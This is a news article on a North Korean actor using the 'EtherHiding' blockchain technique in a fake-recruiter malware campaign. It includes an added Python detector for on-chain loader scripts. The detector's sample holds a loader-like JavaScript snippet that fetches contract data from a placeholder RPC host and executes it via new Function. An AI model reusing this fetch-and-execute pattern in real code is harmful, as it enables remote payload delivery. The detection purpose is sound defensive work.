A North Korean threat actor has been found using a blockchain-based technique, known as ‘EtherHiding,’ to deliver malware to facilitate cryptocurrency theft.
EtherHiding is a technique where attackers embed malicious code, such as JavaScript payloads, inside a blockchain-based smart contract, effectively using the decentralized ledger as a resilient command-and-control (C2) server.
This is the first time Google Threat Intelligence Group (GTIG) has observed a nation-state actor adopting this method, GTIG said in a blog post published on October 16.
The use of EtherHiding is resilient against conventional takedown and blocklisting efforts, GTIG explained.
The threat intelligence group has tracked the threat actor UNC5342 incorporating EtherHiding into an ongoing social engineering campaign since February 2026.
EtherHiding Pros for Hackers, Cons for Defenders
EtherHiding offers several significant advantages to attackers, positioning it as a particularly challenging threat to mitigate, GTIG noted.
One element of EtherHiding that is particularly concerning is its decentralized nature. The malicious code is stored on a decentralized and permissionless blockchain, meaning there is no central server that law enforcement or cybersecurity firms can take down.
The identity of an attacker is also difficult to trace because of the pseudonymous nature of blockchain transactions.
It is also difficult to remove malicious code from smart contracts deployed on the blockchain unless you are the contract owner. The attacker who controls the smart contract can update the malicious payload at any time.
While security researchers attempt to warn the community by tagging a contract as malicious on official blockchain scanners (like the warning on BscScan in Figure 5), the contract continues to serve its payload and the malicious activity carries on regardless.
Finally, attackers can retrieve the malicious payload using read-only calls that do not leave a visible transaction history on the blockchain, making their activities harder to track.
The threat research report said that EtherHiding represents a “shift towards next-generation bulletproof hosting” where the inherent features of blockchain technology are used for malicious purposes.
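Because the payload lives on-chain and is fetched with read-only calls, the detection opportunity for defenders is on the client side: the injected loader script still has to ship a JSON-RPC `eth_call` to a public node, decode the returned hex into text and hand it to a code-execution sink. The following is an added example, not code from the article or from GTIG, that scores a script for those indicators and separately extracts contract addresses from captured JSON-RPC request bodies (for example from proxy logs). The sample scripts, the RPC hostname and the contract addresses are all constructed placeholders.

```python
import json
import re

# Indicators an EtherHiding-style loader typically combines in one script.
# Each on its own is common in legitimate web3 code; the combination is what matters.
INDICATORS = {
    # JSON-RPC read-only call; leaves no on-chain transaction (see article).
    "eth_call": re.compile(r"""["']eth_call["']"""),
    # Hand-rolled JSON-RPC envelope rather than a wallet library.
    "json_rpc_envelope": re.compile(r"""jsonrpc\s*[:=]\s*["']2\.0["']"""),
    # Turning a returned hex blob back into a string.
    "hex_decode": re.compile(r"hexTo\w*|fromHex|fromCharCode|parseInt\([^)]*,\s*16\)"),
    # Executing text as code.
    "exec_sink": re.compile(
        r"\beval\s*\(|\bnew\s+Function\s*\(|document\.write\s*\(|"
        r"""createElement\s*\(\s*["']script["']\s*\)"""
    ),
}

# A 20-byte EVM address, not part of a longer hex string such as a tx hash.
ADDRESS_RX = re.compile(r"(?<![0-9a-zA-Z])0x[0-9a-fA-F]{40}(?![0-9a-fA-F])")


def scan_script(text):
    """Score one script body. Returns a verdict plus the indicators and addresses found."""
    hits = {name: bool(rx.search(text)) for name, rx in INDICATORS.items()}
    addresses = sorted({a.lower() for a in ADDRESS_RX.findall(text)})
    if hits["eth_call"] and hits["exec_sink"]:
        verdict = "suspicious"      # reads contract data and executes it
    elif hits["eth_call"] or hits["exec_sink"]:
        verdict = "review"          # one half of the pattern; needs a human look
    else:
        verdict = "benign"
    return {"verdict": verdict, "indicators": hits, "contract_addresses": addresses}


def extract_eth_call_targets(body):
    """Return the lowercased `to` addresses of every eth_call in a JSON-RPC body.

    Accepts a single request or a batch (JSON array); malformed input yields [].
    Useful for turning proxy logs of outbound RPC traffic into a contract watchlist.
    """
    try:
        parsed = json.loads(body)
    except json.JSONDecodeError:
        return []
    requests = parsed if isinstance(parsed, list) else [parsed]
    targets = []
    for req in requests:
        if not isinstance(req, dict) or req.get("method") != "eth_call":
            continue
        params = req.get("params") or []
        if params and isinstance(params[0], dict):
            to = str(params[0].get("to", ""))
            if ADDRESS_RX.fullmatch(to):
                targets.append(to.lower())
    return targets


# Constructed sample inputs (placeholders, not real indicators).
BENIGN_WALLET_UI = """
const balance = await provider.getBalance("0x1111111111111111111111111111111111111111");
document.getElementById("bal").textContent = balance.toString();
"""

LOADER_LIKE = """
const rpc = "https://rpc.example-chain.invalid/";
const body = JSON.stringify({jsonrpc:"2.0", id:1, method:"eth_call",
  params:[{to:"0x2222222222222222222222222222222222222222", data:"0x20965255"}, "latest"]});
fetch(rpc, {method:"POST", body}).then(r => r.json()).then(j => {
  const src = hexToUtf8(j.result);
  new Function(src)();
});
"""

if __name__ == "__main__":
    for label, sample in (("wallet UI", BENIGN_WALLET_UI), ("loader-like", LOADER_LIKE)):
        print(label, json.dumps(scan_script(sample), indent=2))
    print(extract_eth_call_targets(
        '{"jsonrpc":"2.0","id":1,"method":"eth_call",'
        '"params":[{"to":"0x2222222222222222222222222222222222222222","data":"0x20965255"},"latest"]}'
    ))
```

The verdict is deliberately coarse: a page that only calls `eth_call` (a price ticker, say) lands in "review", and only the pairing of a read-only contract call with an execution sink is marked "suspicious". The addresses that `extract_eth_call_targets` pulls from request bodies can be compared against the contract tagged as malicious on a block explorer, which is the practical way to act on the scanner warnings the article mentions.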
EtherHiding Part of Elaborate North Korea Scam Campaign
Google has linked the use of EtherHiding to a social engineering campaign tracked by Palo Alto Networks as ‘Contagious Interview.’
In this campaign, the threat actor uses JADESNOW malware to deploy a JavaScript variant of INVISIBLEFERRET, which has led to numerous cryptocurrency heists.
The campaign targets developers in the cryptocurrency and technology sectors to steal sensitive data and cryptocurrency and to gain persistent access to corporate networks.
It centers around elaborate social engineering tactics that mimic legitimate recruitment processes through fake recruiters and fabricated companies.
Fake recruiters lure candidates onto platforms like Telegram or Discord, then deliver malware through deceptive coding tests or fake software downloads disguised as technical assessments or interview fixes.
The campaign employs a multi-stage malware infection process (involving JADESNOW, BEAVERTAIL and INVISIBLEFERRET) to compromise the victim’s system, and the tooling can affect Windows, macOS and Linux systems.